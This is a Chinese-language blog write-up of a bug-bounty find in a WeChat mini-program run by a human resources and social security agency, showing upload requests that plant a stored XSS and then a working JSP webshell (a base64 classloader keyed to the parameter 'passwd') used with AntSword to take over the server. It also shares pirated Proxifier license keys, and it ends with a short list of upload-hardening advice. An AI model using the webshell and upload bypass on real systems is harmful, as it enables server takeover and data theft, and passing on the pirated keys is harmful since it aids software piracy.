漏洞挖掘 | 浅谈一次edusrc文件上传成功getshell

0x1 前言

这里记录一下我在微信小程序挖人社局等一些人力资源和社会保障部信息中心漏洞,人社这类漏洞相对于web应用端的漏洞来讲要好挖很多,里面的WAF过滤等一些验证也少。比如你在开始学习src漏洞挖掘,就可以从微信小程序下手。
一般像这类漏洞可以在微信小程序检索就业、人社、贷款等关键字

图片

这类漏洞的话可以在edusrc提交,对于初学者来讲还是蛮友好的,提交多个人社的漏洞,达到一定的rank值,也是可以换取一些礼物的:

图片

0x2 微信小程序抓包工具——Proxifter

新版安装:
Proxifier 官网地址:https://www.proxifier.com/
此软件是收费的,提供免费31天的试用,Win版本的分为安装版和便携版,安装版就是直接双击运行,然后下一步下一步就可以了;便携版需要使用解压软件解压到文件夹,解压后直接运行文件夹里的可执行文件即可。本着白嫖的想法,本文提供三个注册码,两个Win的注册码经验证目前均可以正常使用,MAC的注册码由于太穷买不起MAC电脑,故没有进行测试,能不能正常使用,是个未知数。注册的时候注册名称随意填写。
这是我从别的大佬那白嫖来的,分享给大家。

 
  1. L6Z8A-XY2J4-BTZ3P-ZZ7DF-A2Q9C(Portable Edition)#免安装版本

  2. 5EZ8G-C3WL5-B56YG-SCXM9-6QZAP(Standard Edition)#安装版本

  3. P427L-9Y552-5433E-8DSR3-58Z68(MAC) #MAC版本

  4. https://www.proxifier.com/download/ProxifierSetup.exe #安装最新版文件下载链接

  5. https://www.proxifier.com/download/ProxifierPE.zip #便携最新版文件下载链接

配置Proxifter

Proxifter工具的配置,主要是配置下面两个代理设置的地方

图片

图片

具体Proxifter配置参考链接:
https://blog.csdn.net/CKT_GOD/article/details/134076065


0x3 渗透测试——漏洞挖掘

一、存储型XSS漏洞

说到XSS漏洞的话,反射型这里就不多说了哈,反射型XSS在edu都不收,说下存储型XSS漏洞。像我平常在什么地方碰到存储型XSS特别多呢,那就是在微信小程序,里面特别容易上手的一个就是在一些个人页面里面的上传头像、身份证信息等一些存在上传点的地方,因为小程序相对来讲过滤不是很严,可以通过一些WAF的绕过进行上传,来弹一个存储型XSS漏洞。

1、先通过这个头像上传点,上传一张照片上去

图片

2、尝试看看能否上传.html后缀的文件,因为可以上传html后缀的都是可以打一个存储型XSS的
这里改下该数据包的filename、Content-Type,发现可以成功上传html文件,那么接下来就是浏览器访问弹个xss了。

 
  1. ------WebKitFormBoundary4KIO2hZ55xAhk62B

  2. Content-Disposition: form-data; name="file"; filename="kali_linux.html"

  3. Content-Type: text.html

  4. test

  5. ------WebKitFormBoundary4KIO2hZ55xAhk62B--

图片

3、可以看到浏览器反弹XSS成功了

 
  1. ------WebKitFormBoundaryybBAbhwqIL86Jdcn

  2. Content-Disposition: form-data; name="file"; filename="test.html"

  3. Content-Type: text/html

  4. <script>alert(1)</script>

  5. ------WebKitFormBoundaryybBAbhwqIL86Jdcn--

图片

二、文件上传——getshell

经过上面的测试发现,这个网站对文件上传过滤不严,那么我们就可以尝试下文件上传,看看可以上传一句话木马,然后getshell嘛。
经审计,发现该小程序网站是Java框架搞的,那么我们就可以尝试上传jsp后缀的webshell编写的木马来尝试下getshell了。

1、尝试上传jsp代码,发现该代码直接被执行了。真的是逆天了,师傅们!一点过滤都没有,直接解析了,那么就说明他这个网站可以执行jsp代码,那我这不就可以上传jsp木马了嘛。

 
  1. ------WebKitFormBoundaryybBAbhwqIL86Jdcn

  2. Content-Disposition: form-data; name="file"; filename="xiaoma.jsp"

  3. Content-Type: text/html

  4. <h1>test</h1>

  5. ------WebKitFormBoundaryybBAbhwqIL86Jdcn--

图片

2、上传jsp木马,使用蚁剑连接,getshell

jsp木马如下,蚁剑连接密码:passwd

 
  1. <%!

  2. class U extends ClassLoader {

  3. U(ClassLoader c) {

  4. super(c);

  5. }

  6. public Class g(byte[] b) {

  7. return super.defineClass(b, 0, b.length);

  8. }

  9. }

  10. public byte[] base64Decode(String str) throws Exception {

  11. try {

  12. Class clazz = Class.forName("sun.misc.BASE64Decoder");

  13. return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);

  14. } catch (Exception e) {

  15. Class clazz = Class.forName("java.util.Base64");

  16. Object decoder = clazz.getMethod("getDecoder").invoke(null);

  17. return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);

  18. }

  19. }

  20. %>

  21. <%

  22. String cls = request.getParameter("passwd");

  23. if (cls != null) {

  24. new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);

  25. }

  26. %>

图片

成功上传jsp木马,然后使用蚁剑成功连接,然后getshell了。

0x4 总结

这篇文章偏基础的src漏洞挖掘,并且讲的内容还是偏向edusrc方面的。但是这里希望对初学者,特别是刚开始学挖漏洞的师傅们有帮助。这类主要是跟师傅们说一个思路和挖掘的一个方向,推荐师傅们可以先从小程序入手,因为确实相对于web端的漏洞挖掘来说要简单,一些维护以及WAF防护方面做的没有那么好。
总的来讲还是希望对师傅们有帮助,后面还有别的一些漏洞挖掘的思路,后续也会写文章给大家更新~

获取网络安全优质免费学习资料与干货教程+

送渗透工具、技术文档、书籍,面试题、视频(基础到进阶。环境搭建,HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等)、应急响应笔记、学习路线。

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

后台文件上传中的 GETshell 漏洞通常发生在服务器处理文件上传请求时,如果未正确验证上传文件类型、大小或内容,恶意用户可能会上传包含恶意脚本的文件,这些脚本可以在服务器上执行,从而获取系统的控制权(shell)。 解决这类漏洞的方法包括: 1. **验证上传内容**:确保上传文件类型限制在预期范围内,比如只允许上传图片、文档等特定类型的文件,而不是可执行文件或包含脚本的文件。 2. **文件名和路径限制**:对上传的文件名进行转义和过滤,避免使用特殊字符造成目录遍历或恶意路径执行。同时,上传文件应存储在安全的、不可执行的文件夹中。 3. **二进制模式检查**:使用二进制模式打开上传文件,而不是文本模式,防止脚本注入。 4. **文件扩展名验证**:即使文件名被修改,也要检查上传文件的实际类型,不依赖于文件名。 5. **文件内容检查**:使用安全的文件内容检测工具,扫描文件的内容以查找可能的恶意代码。 6. **启用安全配置**:启用服务器的文件权限管理,确保上传的文件只能被拥有者或授权用户访问,而不能执行。 7. **使用预定义上传目录**:避免使用相对或绝对路径,而是使用预定义的上传目录,减少潜在的路径遍历攻击。 8. **启用HTTP头限制**:设置合适的Content-Type限制,防止恶意构造的请求头引发漏洞。 9. **更新和补丁管理**:定期更新服务器软件和框架,修复已知的安全漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值